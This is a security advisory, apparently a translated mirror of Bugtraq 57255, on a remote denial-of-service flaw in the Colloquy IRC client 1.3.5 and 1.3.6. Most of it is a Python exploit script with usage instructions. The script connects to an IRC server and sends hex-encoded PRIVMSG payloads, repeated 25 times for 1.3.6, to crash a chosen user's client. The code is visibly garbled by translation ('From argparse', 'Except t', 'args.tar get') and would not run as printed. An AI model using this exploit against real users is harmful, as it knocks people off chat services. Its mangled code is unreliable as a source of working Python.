Release date:
Updated on:
Affected Systems:
Colloquy 1.3.6
Colloquy 1.3.5
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57255
Colloquy is an advanced IRC, SILC & ICB client.
A remote denial of service vulnerability exists in Colloquy 1.3.5 and 1.3.6. Attackers can exploit this vulnerability to cause the target application to crash and cause a denial of service.
<* Source: Aph3x
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
######################################## ######################################## ###
###
# H o w-t o #
###
########################
#
# Provide the Target: Server, Port, Nickname and the script will deliver
# The payload...
#
#[! USE/] $./<file>. py-t <server>-p <port>-n <nickname>
#
######################################## ######################################## ###
From argparse import ArgumentParser
From time import sleep
Import socket
Shellcode = {
# One Shot <3
'One _ shot ':[\
"687474703a2f2f782f2e2425235e26402426402426232424242425232426 ",
"23242623262340262a232a235e28242923404040245e2340242625232323 ",
"5e232526282a234026405e242623252623262e2f2e2e2e2f2e2e2e2f2324 ",
"2e24"],
#1.3.5
'1 _ 3_5 ':[\
"687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428 ",
"292c7573657228292c2873656c6563741532302d2d687474703a2f2f6874 ",
"74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c"
"7573657228292c2873656c6563710932302d2d687474703a2f2f"],
#1.3.6-(Requires Sending 25 Times)
'1 _ 3_6 ':[\
"687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428 ",
"292c7573657228292c2873656c6563741532302d2d687474703a2f2f6874 ",
"74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c ",
"7573657228292c2873656c6563710932302d2d687474703a2f2f"],
}
Def own (sock, target, SC _key = 'one _ shot '):
SC = ''. join (shellcode [SC _key])
Targ = ''. join (''. join ([hex (ord (ch) for ch in target]). split ('0x '))
Msg = "505249564d534720 {} 203a {} 0d0a". format (targ, SC)
If SC _key not in '1 _ 3_6 ':
Sock. send (bytes. fromhex (msg ))
Else:
Try:
For x in range (1, 26 ):
Sock. send (bytes. fromhex (msg ))
Sleep (. 64)
Except t:
Print ('failed! ')
Def connect (uri, port, target, SC _key ):
Sock = socket. socket ()
Try:
Ret = sock. connect_ex (uri, int (port )))
Sock. recv (8096)
Except t:
Print ("\ t [-] Failed To Connect To {}". format (uri ))
Exit ()
Sock. send (B "\ x4e \ x49 \ x43 \ x4b \ x20 \ x7a \ x65 \ x6d \ Xi 7 \ x30 \ x64 \ x61 \ x79 \ x0d \ x0a ")
Sock. send (B "\ x55 \ x53 \ x45 \ x52 \ x20 \ x7a \ x65 \ x6d \ cross 7 \ x30 \ x64 \ x61 \ x79 \ x20 \ x48 \ x45 \ x48 \ x45 \ x20 \ x48 \ x45 \ x48 \ x45 \ x20 \ x3a \ x3c \ x33 \ x0d \ x0a ")
While True:
Host_data = str (sock. recv (8096). strip ())
If '20140901' in host_data:
Print ('\ t [+] Connection Successful Sending Payload To {}'. format (target ))
Own (sock, target, SC _key)
Sock. send (B 'quit \ r \ n ')
Sock. close ()
Break
Try:
Msg = host_data.split ()
If msg [0]. lower () is 'ping ':
Sock. send (B "PONG {} \ r \ n". format (msg [1])
Continue
Except t:
Pass
Print ('\ t [!] Payload Sent, Target shoshould Drop Shortly <3 ')
If _ name _ = '_ main __':
Parser = ArgumentParser (description = '# legion Colloquy IRC DoS; Requires At Least A Nick To Target ')
Parser. add_argument ('-t',' -- target', dest = 'target', default = 'localhost', help = "IRCD Server Uri To Connect On ")
Parser. add_argument ('-p',' -- port', dest = 'Port', default = 6667, help = "port To Connect On ")
Parser. add_argument ('-n',' -- nick ', dest = 'Nick', metavar = 'Nick ', help = "nick To Target ")
Parser. add_argument ('-S',' -- shellcode', dest = 'shellcode', default = 'one _ shot ',
Help = 'Shell Code To Use, (one_shot, 1_3_5, 1_3_6 )')
Args = parser. parse_args ()
If args. nick is None:
Parser. print_help ()
Exit ()
Connect (args.tar get, args. port, args. nick, args. shellcode. strip ())
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Colloquy
--------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://colloquy.info/